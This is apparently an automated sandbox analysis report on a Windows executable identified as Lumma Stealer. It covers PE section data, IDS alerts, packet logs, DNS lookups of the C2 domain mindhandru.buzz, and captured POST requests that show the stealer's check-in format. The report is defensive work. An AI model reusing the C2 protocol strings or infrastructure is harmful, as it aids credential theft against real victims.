                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [ecx+00000080h], dh
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], dh
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax+eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                0x10000x520000x26400ce8dc481e3c4f9b015a71b14bde8164dFalse0.9995787377450981data7.983643456292964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                0x550000x2ae0000x200ea1d0f70ac657ca34b560f6d6845c1b2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                nyylnyuw0x3030000x1a20000x1a1e0087aa5134da9e3cbc02b7993d4c834da7False0.9946991614941669data7.9545802741870855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                dppqrxbg0x4a50000x10000x40013cb9687cf0d838ecaa60b98cc556312False0.771484375data6.099227998581096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .taggant0x4a60000x30000x2200f9ac1f028d74351a011a4469e736be2dFalse0.06525735294117647DOS executable (COM)0.7719994436700762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                kernel32.dlllstrcpy

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-27T08:59:11.907933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:12.671287+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549711172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:12.671287+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549711172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:13.895136+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:14.650892+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549713172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:14.650892+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549713172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:16.606177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:19.060275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:20.137751+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549716172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:21.643605+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:24.460638+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:27.045522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549736172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:27.062550+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549736172.67.165.185443TCP
                                                                                                                2024-12-27T08:59:30.334772+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742172.67.165.185443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 27, 2024 08:59:10.506525040 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:10.506565094 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:10.506879091 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:10.519331932 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:10.519357920 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:11.907841921 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:11.907932997 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:11.910670996 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:11.910686970 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:11.910903931 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:11.955054045 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:11.955075026 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:11.955153942 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.671298027 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.671402931 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.671449900 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.673518896 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.673540115 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.673558950 CET49711443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.673563957 CET44349711172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.681427956 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.681468010 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:12.681569099 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.681838989 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:12.681850910 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:13.894998074 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:13.895136118 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:13.896441936 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:13.896456003 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:13.896698952 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:13.898377895 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:13.898406029 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:13.898448944 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.650903940 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.650949955 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.650994062 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.651017904 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.651046038 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.651094913 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.651102066 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.659291029 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.659356117 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.659450054 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.659461021 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.659518957 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.670706034 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.678889036 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.679068089 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.679080009 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.725301027 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.770500898 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.819179058 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.819217920 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.843043089 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.843101978 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.843127966 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.846715927 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.846775055 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.846879005 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.846903086 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:14.846925974 CET49713443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:14.846931934 CET44349713172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:15.103595972 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:15.103634119 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:15.103718042 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:15.104032993 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:15.104055882 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:16.606040955 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:16.606177092 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:16.607744932 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:16.607755899 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:16.607991934 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:16.609462976 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:16.609462976 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:16.609491110 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:17.506114006 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:17.506217003 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:17.506304026 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:17.506520033 CET49714443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:17.506536007 CET44349714172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:17.617815971 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:17.617835045 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:17.617909908 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:17.618218899 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:17.618228912 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:19.060178995 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:19.060275078 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:19.061527967 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:19.061542988 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:19.061783075 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:19.063260078 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:19.063260078 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:19.063306093 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:19.063364029 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:19.111335039 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:20.137834072 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:20.138128042 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:20.138303995 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:20.138523102 CET49716443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:20.138544083 CET44349716172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:20.386065960 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:20.386120081 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:20.386210918 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:20.386519909 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:20.386543989 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:21.643502951 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:21.643604994 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:21.644999027 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:21.645005941 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:21.645243883 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:21.646604061 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:21.646729946 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:21.646756887 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:21.646846056 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:21.646853924 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:22.720063925 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:22.720181942 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:22.720242023 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:22.720406055 CET49722443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:22.720419884 CET44349722172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:23.201103926 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:23.201158047 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:23.201231956 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:23.201550007 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:23.201564074 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.460563898 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.460638046 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.461981058 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.461987019 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.462217093 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:24.463413954 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.463510990 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:24.463515997 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256155014 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256294966 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.256382942 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.256455898 CET49728443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.256480932 CET44349728172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.785500050 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.785567045 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:25.785856962 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.786031008 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:25.786048889 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.045455933 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.045521975 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.046938896 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.046947002 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.047269106 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.061058998 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.061997890 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062036037 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062131882 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062163115 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062268972 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062433958 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062556982 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062582970 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062717915 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062745094 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062875032 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062901020 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.062907934 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.062915087 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063038111 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063060999 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063082933 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063097000 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063179970 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063194990 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063216925 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063229084 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063240051 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063252926 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:27.063287020 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.063334942 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.084697008 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:27.084712029 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495518923 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495618105 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.495687962 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.495865107 CET49736443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.495882988 CET44349736172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.530735016 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.530792952 CET44349742172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:29.530900955 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.531240940 CET49742443192.168.2.5172.67.165.185
                                                                                                                Dec 27, 2024 08:59:29.531255007 CET44349742172.67.165.185192.168.2.5
                                                                                                                Dec 27, 2024 08:59:30.334772110 CET49742443192.168.2.5172.67.165.185

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 27, 2024 08:59:10.360528946 CET6087453192.168.2.51.1.1.1
                                                                                                                Dec 27, 2024 08:59:10.499123096 CET53608741.1.1.1192.168.2.5

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 27, 2024 08:59:10.360528946 CET192.168.2.51.1.1.10xefa1Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 27, 2024 08:59:10.499123096 CET1.1.1.1192.168.2.50xefa1No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                                Dec 27, 2024 08:59:10.499123096 CET1.1.1.1192.168.2.50xefa1No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • mindhandru.buzz

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549711172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:11 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-27 07:59:12 UTC1125INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:12 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=b43c8s4i3im7gf0ou9v6jjlhlh; expires=Tue, 22 Apr 2025 01:45:51 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVqGwrYf5E9fhoos4spQTpzgpXdAMCpHQf5mCi%2F6srpDrnmpjYkpja0n9z%2BISSlhSQL8zmmKOwdOm78py7q17EZpsnGXiLf0UIFsVkXajJ%2FxY190RI2dT%2BtHL8jNR4QDSz8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c5152ff7c411-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1578&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1796923&cwnd=224&unsent_bytes=0&cid=fb6b5ed258a89684&ts=773&x=0"
                                                                                                                2024-12-27 07:59:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-27 07:59:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549713172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:13 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                2024-12-27 07:59:14 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:14 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=fkvp41nl32ncj7kl2qd3dfqei9; expires=Tue, 22 Apr 2025 01:45:53 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
